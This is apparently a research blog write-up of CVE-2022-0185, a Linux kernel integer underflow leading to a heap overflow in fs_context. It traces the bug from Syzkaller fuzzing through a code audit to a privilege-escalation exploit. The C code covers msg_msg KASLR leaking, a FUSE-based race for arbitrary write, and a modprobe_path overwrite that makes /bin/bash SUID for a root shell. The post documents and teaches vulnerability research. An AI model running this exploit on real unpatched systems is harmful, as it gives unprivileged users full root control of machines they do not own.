CVE Explained

17 min read

CVE-2022-0185: A Case Study

A tale on discovering a Linux kernel privesc

clubby789,
Jan 16
2022

CVE-2022-0185 was a 2-year-old bug in the Linux kernel. Introduced in Linux v5.1, an integer underflow bug in fs/fs_context.c allowed for a heap buffer overflow, which could allow any authenticated user to completely compromise the system.

Introduction

I've been playing CTFs with my team for a few years, and we've become increasingly interested in kernel exploits - both when solving and creating our own challenges. Some members of my team have even developed a novel exploitation technique that has since become common in real-life kernel exploits. We decided to apply our knowledge to discovering and exploiting a bug in the modern Linux kernel.

This article assumes a working knowledge of kernel fundamentals, but key concepts will be explained along the way.

Discovery

Finding vulnerabilities is often compared to finding a needle in a haystack. Meaning it is much more time-consuming than mentally challenging. So like most researchers, we opted to let the computer sift through the haystack by running a fuzzer that sends programs unexpected data and records all crashes. A kernel should never crash, and when it does, it’s a good potential lead for a place that might be exploitable.

As we were looking for a kernel bug we opted to use Google's coverage-based kernel fuzzer, Syzkaller. This program allows distributed nodes to fuzz the Linux kernel with random syscalls, attempting to reach as much kernelspace code as possible. If a set of input causes the kernel to crash (or if an incorrect address is detected), Syzkaller will begin diverting resources to 'reproducing' the crash - creating a program that can be reliably run to cause the crash.

After just a few days of fuzzing, we received a KASAN (kernel address validator) violation:

BUG: KASAN: slab-out-of-bounds in legacy_parse_param+0x450/0x640 fs/fs_context.c:569
Write of size 1 at addr ffff88802d7d9000 by task syz-executor.12/386100

CPU: 3 PID: 386100 Comm: syz-executor.12 Not tainted 5.14.0 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
Call Trace:
 legacy_parse_param+0x450/0x640 fs/fs_context.c:569
 vfs_parse_fs_param+0x1fd/0x390 fs/fs_context.c:146
 vfs_fsconfig_locked+0x177/0x340 fs/fsopen.c:265
 __do_sys_fsconfig fs/fsopen.c:439 [inline]
[ ... ]
The buggy address belongs to the object at ffff88802d7d8000
 which belongs to the cache kmalloc-4k of size 4096
The buggy address is located 0 bytes to the right of
 4096-byte region [ffff88802d7d8000, ffff88802d7d9000)

This indicates that the kernel has allocated a block of 4096 bytes, and the function legacy_parse_param tried to write outside of this specific area. Syzkaller quickly provided us with a C example, allowing us to better examine the logic

#define _GNU_SOURCE 

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
uint64_t r[1] = {0xffffffffffffffff};
int main(void) {
	syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	intptr_t res = 0;
	memcpy((void*)0x20000000, "9p\000", 3);
	res = syscall(__NR_fsopen, 0x20000000ul, 0ul);
	if (res != -1)
		r[0] = res;
	memcpy((void*)0x20001c00, "\000\000\344]\233", 5);
	memcpy((void*)0x20000540, "<long string>", 641);
	syscall(__NR_fsconfig, r[0], 1ul, 0x20001c00ul, 0x20000540ul, 0ul);
	int i;
	for(i = 0; i < 64; i++) {
		syscall(__NR_fsconfig, r[0], 1ul, 0x20001c00ul, 0x20000540ul, 0ul);
	}
	memset((void*)0x20000040, 0, 1);
	memcpy((void*)0x20000800, "<long string>", 641);
	syscall(__NR_fsconfig, r[0], 1ul, 0x20000040ul, 0x20000800ul, 0ul);
	for(i = 0; i < 64; i++) {
		syscall(__NR_fsconfig, r[0], 1ul, 0x20000040ul, 0x20000800ul, 0ul);
	}
	return 0;
}

As Syzkaller doesn't understand anything about the data it passes to the kernel, it’s showing the path it took to the crash, which includes unneeded and inefficient steps. It's up to us to interpret and reduce this PoC into something we can work with, cleaning out the parts that aren’t relevant. For example, a number of regions are mapped into the process using mmap, but only various parts of the 0x20000000ul range are used, so we can remove those other mmap calls. For how it is used, uint64_t r[1] = {0xffffffffffffffff}; is just an more complicated way of writing int r = -1;.We can replace each instance of an address with a variable or constant, so instead of using memcpy to copy the string “9P” into a buffer and then passing that buffer into the syscall, we can just use the string. After several simplifications, that above code reduces to:

int r = -1;
int main(void) {
	int res = 0;
	res = syscall(__NR_fsopen, "9p", 0ul);
	if (res != -1)
		r = res;
}

After a few passes, and cross-referencing our input against the relevant kernel function, we can produce a minimal reproducible example that exhibits the same behavior:

#define _GNU_SOURCE
#include <sys/syscall.h>
#include <stdio.h>
#include <stdlib.h>
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
int main(void) { 
	char* key = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	int fd = 0;
	fd = fsopen("9p", 0);
	for (int i = 0; i < 130; i++) { 
		fsconfig(fd, FSCONFIG_SET_STRING, "\x00", key, 0);
	}
}

Code Audit

The function that both allocates and overflows our heap buffer is here:

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param) {
	struct legacy_fs_context *ctx = fc->fs_private;	// [1]
	unsigned int size = ctx->data_size;			// [2]
	size_t len = 0;
	int ret;
	[ ... ]
	switch (param->type) {
	case fs_value_is_string:
		len = 1 + param->size;				// [3]
	case fs_value_is_flag:
		len += strlen(param->key);
		break;
	default:
		return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported", param->key);
	}
	if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large"); // [4]
	[ ... ]
	if (!ctx->legacy_data) {
		ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);	// [5]
		if (!ctx->legacy_data) return -ENOMEM;
	}
	ctx->legacy_data[size++] = ',';      // [6]
	len = strlen(param->key);
	memcpy(ctx->legacy_data + size, param->key, len);
	size += len;
	if (param->type == fs_value_is_string) {
		ctx->legacy_data[size++] = '=';
		memcpy(ctx->legacy_data + size, param->string, param->size);
		size += param->size;
	}
	ctx->legacy_data[size] = '\0';
	ctx->data_size = size;
	ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
	return 0;
}

The system call fsopen creates a new filesystem context, which a user can use to mount a new filesystem. Certain filesystem types are marked as 'legacy', and trigger this code path. In this case, 9p (the Plan 9 filesystem) is one such filesystem and the one our fuzzer used to trigger the vulnerable code. ext4, another very common filesystem in the modern Linux world, also triggers it.. fsconfig allows us to write a new key/value pair into ctx->legacy_data, which is a buffer 4096 bytes in size that is allocated the first time the filesystem is configured.

At line 2 we load the legacy_fs_context (associated with the file descriptor), and on the next line (3) we load size from it, which is the number of bytes written to the buffer so far. At line 9, len becomes the length of the data we'll write - strlen(key) + 1 + strlen(value). This maps to the mount option string key=value.

At line 16, bounds checking is performed, which should prevent heap overflows. As should be clear from the introduction the bug is here, but we'll return to this later.

At line 19, we allocate our PAGE_SIZE (4096) sized buffer for the first time. Finally, at line 22, our data begins to be written to the heap. A comma is written, then our key, then an equals sign, and then our value. Finally, a terminating null byte is added, and the new size of the data is saved back.

Bug Analysis

The issue lies here: if (len > PAGE_SIZE-2-size) return invalf(fc, "VFS: Legacy: Cumulative options too large");. Remember that len is what's about to be written, PAGE_SIZE is the total buffer size, and size is the size of the data written already. An additional 2 bytes is added to the check, to account for the beginning comma and the terminating null byte.

The issue here is the use of subtraction to perform this check. size is an unsigned value, which can lead to integer underflow. 'Unsigned' means that a value has no sign (+/-), and is therefore always treated as positive. If a subtraction results in a number going below 0, then it will instead wrap around to the highest possible value!
After 117 iterations of adding a key of length 0 and a value of length 33, the size is 4095 (117 * (33 + 2)). If we take the statement step by step:

PAGE_SIZE - 2 -> 4094
(PAGE_SIZE - 2) - size -> -1 == 18446744073709551615 when converted to an unsigned value.len > ((PAGE_SIZE - 2) - size) -> len > 18446744073709551615 -> false - The right-hand side of the check is the maximum possible value for len, so it will never exceed it. Therefore, once we reach 4095 bytes of length, our input will be completely unrestricted. After the leading comma of our next value is written, our next string (of unlimited length) will be written into the following 4096 byte page/heap allocation!

Beginning Exploitation

We now have an entirely controlled write in the heap. The Linux kernel groups dynamic allocations of memory in caches of similar sizes known as 'slabs' - the slab in which our write occurs is known as kmalloc-4k. Every allocation in a slab exists in a contiguous memory block. We can therefore be sure that overflowing our kmalloc-4k allocation will corrupt a neighboring kmalloc-4k structure.

This particular area of the heap is interesting, as it is used relatively little by the kernel. This mean that we're less likely to corrupt data structures that we don't want to, which can result in exploit instability or even a system crash. However, there's a downside to this - it means that the number of structs allocated in this slab is low, and the number of useful target structs (heap gadgets) is even lower.

Luckily, my teammate FizzBuzz101 had recently explored and documented the use of the System V IPC message queue feature (known to us as msg_msg) in a very detailed writeup. This is an object that is:

Usable by low privilege users
Can be used to trigger allocations in any heap slab up to 4k
Can be abused for both out-of-bounds read and write

Gaining a KASLR/kernel slide leak

In all real-life scenarios, KASLR will be enabled. This kernel feature offsets every function and variable in the kernel by a static value that changes on every boot. We need to leak the address of a kernel global variable or function that we can use to find the kernel's base address, much like leaking the Libc base in normal user program exploitation.

msg_msg has a useful property in that messages of a certain size will be split - after 0x30 bytes of msg_msg metadata and 0xfd0 bytes of data. The remainder will be allocated in an appropriately sized chunk, and a next pointer added to the first message. When we later receive our IPC message, the list pointers will be followed up until the m_ts (size) field has been reached.

To gain our kernel address leak, we'll attempt to 'spray' allocations of seq_operations - causing the kernel to create a large number of these objects on the heap, which live in the kmalloc-32 slab. This is a useful struct to target as it can be allocated by opening /proc/self/stat, and it contains 4 function pointers.

To reach this structure, our strategy will be:

Prepare the fs_context buffer for overflowing
Spray seq_operations structures into the kmalloc-32 slab
Spray a number of large messages into several message queues (size 0xfe8, which will allocate its second segment in kmalloc-32)
Use our overflow in kmalloc-4k to corrupt the m_ts/size field of the initial message
Request all of our messages back from our prepared queues, requesting the increased size values
Scan through the received buffer until we locate a valid kernel pointer
If subtracting this leads to a valid, aligned kernel base address, we've got our leak

void *do_kaslr_leak () {
	uint64_t kbase = 0;
	char pat[0x30] = {0};
	char buffer[0x2000] = {0}, received[0x2000] = {0};
	msg *message = (msg *)buffer;
	int size = 0x1018;
	int targets[K_SPRAY] = {0};
	int i;
	// Spray queues/messages
	for (i = 0; i < K_SPRAY; i++) {
		memset(buffer, 0x41+i, sizeof(buffer));
		targets[i] = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);
		send_msg(targets[i], message, size - 0x30, 0);
	}
	// Spray function pointers
	for (int i = 0; i < 100; i++) {
		open("/proc/self/stat", O_RDONLY);
	}
	get_msg(targets[0], received, size - 0x30, 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
	memset(pat, 0x42, sizeof(pat));
	pat[sizeof(pat)-1] = '\x00';
	fd = fsopen("ext4", 0);
	if (fd < 0) {
		exit(-1);
	}
	strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
	for (int i = 0; i < 117; i++) {
		fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);
	}
	// Corrupt the size field to 0x1060
	char tiny[] = "DDDDDDD";
	char tiny_evil[] = "DDDDDD\x60\x10";
	fsconfig(fd, FSCONFIG_SET_STRING, "CCCCCCCC", tiny, 0);
	fsconfig(fd, FSCONFIG_SET_STRING, "\x00", tiny_evil, 0);
	size = 0x1060;
	for (int i = 0; i < K_SPRAY; i++) {
		get_msg(targets[i], received, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
		// Check for valid kernel pointer and aligned base
		kbase = do_check_leak(received);
		if (kbase) {
			return (void*)kbase;
		}
	}
	puts("[X] No leaks, trying again");
	close(fd);
	return 0;
}

A number of tricks were used here, both to increase the reliability of our buffers overlapping and to prevent unintended collision causing instability and crashing. These have been omitted here, as they are kernel and hardware dependent, requiring manual tweaking.

Arbitrary write

The second half of most kernel exploits is arbitrary write, or 'write-what-where'. This primitive allows us to write a controlled value to any location we want. For this, we'll once again use msg_msg.

This technique is very thoroughly explained in the original writeup, but I'll attempt to summarize it here.
Similarly to our address leak, we'll abuse msg_msg's 'splitting' behavior for large messages. This time, we'll abuse a race condition.

The first message chunk is allocated
Our data is copied into it
The second message chunk is allocated
The next pointer of the first chunk is populated
The remainder of our data is copied into the next pointer.

There's a thin race window between points 4 and 5. If we can overwrite the next field before our data is copied to it, we'll have our data written to a fully controlled location. However, this is a very tight window. There's no obvious place that the kernel would yield control to us, so it would appear that we'll have to get very lucky with threads and timing. Fortunately, there are a couple of techniques that can be applied to increase our chances of success.

We need the kernel to run our code just before it copies our data. userfaultfd is a very common mechanism for this. When the kernel attempts to access an address that isn't mapped but is registered with userfaultfd, it will call our code to handle the fault. During this, we can perform whatever action is necessary to race, then yield control back to the kernel. Unfortunately, recent versions of Linux and several distributions have chosen to restrict this feature to the root user only, due to the obvious security implications.

FUSE

Luckily, a new technique has come into use - FUSE. Linux allows users to write their own filesystem drivers that run as unprivileged user code (F ilesystem in USE rspace). We simply have to implement a minimal FUSE filesystem, then open a file in it, map it into memory using mmap, then pass the returned address to the kernel. As soon as the kernel attempts to read from the FUSE-backed address, it will need to call our read function that we define. In order to only trigger after reading our first 0x1024-sized chunk of data, we'll allocate two memory blocks - the first is regular memory, the second is FUSE-backed.

void *evil_page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
uint64_t race_page = 0x1338000;
puts("[*] Preparing fault handlers via FUSE");
int evil_fd = open("evil/evil", O_RDWR);
if (evil_fd < 0) {
  perror("evil fd failed");
  exit(-1);
}
if ((mmap(0x1338000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, evil_fd, 0)) != 0x1338000) {
  perror("mmap fail fuse 1");
  exit(-1);
}

The full malicious filesystem implementation has a lot of boilerplate, so I'll summarize it here.

We begin by opening a pipe pair - this is a buffer shared by two processes that can be used to send data between them. In our case, we'll just be using it for simple synchronization
We fork our exploit and have the child process run as a FUSE daemon, processing filesystem requests
We do the first half of our exploit, preparing leaks
We open/mmap our evil file
We prepare our exploit to overflow the heap, using fsopen and fsconfig up to 4096 bytes
We create a thread that performs the overflow and overwrites the next pointer
Meanwhile, the main thread triggers msg_send, which will yield to our FUSE code
Our FUSE code calls read on the shared pipe, which will cause it to block until a byte is written to it
By this point, our overflowing thread has performed the exploit, and writes to the pipe. This causes FUSE to release and the thread to finish, which copies our malicious data into our controlled pointer

Write Target

We now have an arbitrary write to any address in the kernel. Where should we target? In proof-of-concept exploits such as this, a common target is modprobe_path. When the kernel needs to load a new module, it will actually call out to a normal user binary, running it as root. This path can be found at /proc/sys/kernel/modprobe (normally /sbin/modprobe), and corresponds to the kernel variable modprobe_path. This makes it a very attractive target. By overwriting this value to a program we control, and causing the kernel to attempt to load a module, the program will be run as root. For our simple exploit, we'll prepare a program to be run:

char *modprobe_win = "/tmp/w";
#define  SHELL  "/bin/bash"
[ ... ]
void modprobe_init() {
  int fd;
  [ ... ]
  char w[] = "#!/bin/sh\nchmod u+s " SHELL "\n";
  chmod(modprobe_trigger, 0777);
  fd = open(modprobe_win, O_RDWR | O_CREAT);
  if (fd < 0) {
    perror("winner creation failed");
    exit(-1);
  }
  write(fd, w, sizeof(w));
  close(fd);
  chmod(modprobe_win, 0777);
  return;
}

This will set the SUID bit on /bin/bash, which will then give a root shell when we trigger it!

Triggering

But how to trigger our overwritten modprobe_path? Luckily, this technique has become well documented, with the rise in popularity of CTF kernel challenges. It turns out that when attempting to execute a file with unknown magic bytes, the kernel will actually use modprobe to attempt to find a module that is able to load the binary.

do_execve return do_execveat_common(fd, filename, argv, envp, flags);
do_execveat_common retval = bprm_execve(bprm, fd, filename, flags);
bprm_execve retval = exec_binprm(bprm);
exec_binrpm ret = search_binary_handler(bprm);
search_binary_handler if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
request_module ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);
call_modprobe
static int call_modprobe(char *module_name, int wait) {
	struct subprocess_info *info;
	static char *envp[] = {
		"HOME=/",
		"TERM=linux",
		"PATH=/sbin:/usr/sbin:/bin:/usr/bin",
		NULL
	};
	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	module_name = kstrdup(module_name, GFP_KERNEL);
	argv[0] = modprobe_path; // <--- overwritten!
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL, free_modprobe_argv, NULL);
	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
}

So all we need to do is prepare a binary with unknown magic bytes, and call it!

char *modprobe_trigger = "/tmp/root";
void modprobe_init() {
  int fd = open(modprobe_trigger, O_RDWR | O_CREAT);
  char root[] = "\xff\xff\xff\xff";
  write(fd, root, sizeof(root));
  close(fd);
  chmod(modprobe_trigger, 0777);
  [ ... ]
}
void modprobe_hax() {
  puts("[*] Attempting to trigger modprobe");
  execve(modprobe_trigger, NULL, NULL);
}
To finish up, we repeatedly attempt to trigger the overwrite and trigger modprobe_path. We can verify if it has succeeded by checking the permissions on /bin/bash:
while (1) {
  do_win();
  modprobe_hax();
  struct stat check;
  // Get permissions on file
  stat(SHELL, &check);
  if (check.st_mode & S_ISUID) {
    break;
  }
}
puts("[*] Exploit success! " SHELL " is SUID now!");
puts("[+] Popping shell");
execve(SHELL, root_argv, NULL);

Wrapping Up

The full code for the exploit is available here, in exploit_fuse.c. There's also a second exploit_kctf.c exploit - a more complex exploit that we designed to escape Google's hardened Vulnerability Research Program Kubernetes cluster. For a more technical writeup of the second approach, my teammate documented our approach on his blog.

I recommend reading both approaches, and the released code, to understand the multiple ways a single bug can be leveraged to bypass different sets of mitigations and achieve different goals.